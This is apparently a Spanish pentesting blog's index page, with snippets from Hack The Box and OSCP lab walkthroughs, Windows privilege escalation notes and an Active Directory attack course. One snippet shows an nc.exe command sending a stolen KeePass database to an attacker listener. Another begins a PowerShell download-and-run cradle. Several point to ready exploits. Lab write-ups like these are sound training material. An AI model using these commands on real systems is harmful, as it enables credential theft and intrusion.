by Ric | Apr 24, 2021 | Blog, Herramientas / tools
La siguiente serie de posts serán un extracto del curso “Attacking Active Directory with Linux”. Al final de los posts haré un review del curso completo. Este es el escenario: Se asume que ya estamos dentro de la red. Primero un scan a toda la red: nmap...
by Ric | Nov 4, 2019 | Blog, Herramientas / tools, OSCP
Ya había hecho esta maquina pero con mucho mucho Metasploit. La verdad es que solo para OSCP tiene sentido no usar metasploit para eternal blue ha. Lo bueno es que descubrí un script que es casi igual de maravilloso. Como siempre empezamos con un nmap (en este caso...
by Ric | Nov 3, 2019 | Herramientas / tools, OSCP
Siempre que corro watson o busco en google Systeminfo de windows es un dolor de cabeza encontrar priv escalation. https://github.com/abatchy17/WindowsExploits pero esta pagina tiene bastantes aunque solo debes correrlos en CTF sistems. Nunca en clientes ja 🙂 MS03-026...
by Ric | Nov 2, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina funciona con Windows. Hay que tener mucho cuidado con el encoding. No me estaba funcionando por eso. Como siempre empezamos con un Nmap root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET Nmap...
by Ric | Oct 30, 2019 | Blog, Herramientas / tools, OSCP
Esta maquina se me hizo muy interesante porque use mucho windows. Tuve que usar otros métodos alternativos para evitar metasploit. Empezamos con Nmap y vemos el puerto 8500 Nmap scan report for 10.10.10.11 Host is up (0.065s latency). Not shown: 997 filtered ports...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins. Nmap scan report for 10.10.10.63 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)...
by Ric | Oct 17, 2019 | Blog, OSCP
Como siempre empezamos con un NMAP root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST Nmap scan report for 10.10.10.15 Host is up (0.022s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION...
by Ric | Oct 6, 2019 | Blog, Herramientas / tools, OSCP
Nota, si es windows 10 puedes usar watson ja… Lo que estoy haciendo es activar la función: function Find-AllVulns { if ( !$Global:ExploitTable ) { $null = New-ExploitTable } Find-MS10015 Find-MS10092 Find-MS13053 Find-MS13081 Find-MS14058 Find-MS15051...
by Ric | Oct 5, 2019 | Blog, Herramientas / tools, OSCP
PowerUpAllchecks En general lo que estoy haciendo es usar la función: function Invoke-AllChecks { <# .SYNOPSIS Runs all functions that check for various Windows privilege escalation opportunities. powershell.exe IEX(New-Object...
by Ric | Jan 24, 2019 | Blog, Herramientas / tools
Hoy me mandaron una página incredible de funciones de Linux y como pueden ser ( abused to get the f**k break out ) brincadas si hay alguna misconfiguracion para elevar tus privilegios o hacer reverse shells. Aquí 🙂 Algunos ejemplos de los que ya usamos en hack the...
by Ric | Oct 27, 2018 | Blog
Esta semana me tocó hacer un pentest de un sistema de remote desktops. Un sistema de remote desktops tiene la finalidad de darle acceso a un usuario para usar aplicaciones predefinidas en una computadora remota. Como ejemplo digamos que alguien en una universidad...
by Ric | Jul 4, 2018 | Blog
10.10.10.95 + Server: Apache-Coyote/1.1 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not...
by Ric | May 28, 2018 | Blog
Segunda maquina del día y esta sin ningún tipo de ayuda. Bueno, si un poco, google. Nmap muestra Smb y XP googleando literal eso me sale un exploit. “Hack windows xp with MS08-067 exploit”, no puede ser tan fácil no? msf > use...
by Ric | May 23, 2018 | Herramientas / tools
para mayor informacion ve Optimum pero aqui puedes encontrar un exe para forzar el privilege escalation de windows 8.1 https://www.exploit-db.com/exploits/41020/
by Ric | May 23, 2018 | Blog
Ayer logre (con ayuda) terminar uno de los challenges aparentemente no debo publicar como lo hice, pero bueno, usen hydra. En el dia dos atacare que ni idea de porque se llama asi… 1 probe Si corren sparta lo único abierto es port 80 y muestra esa foto. Si...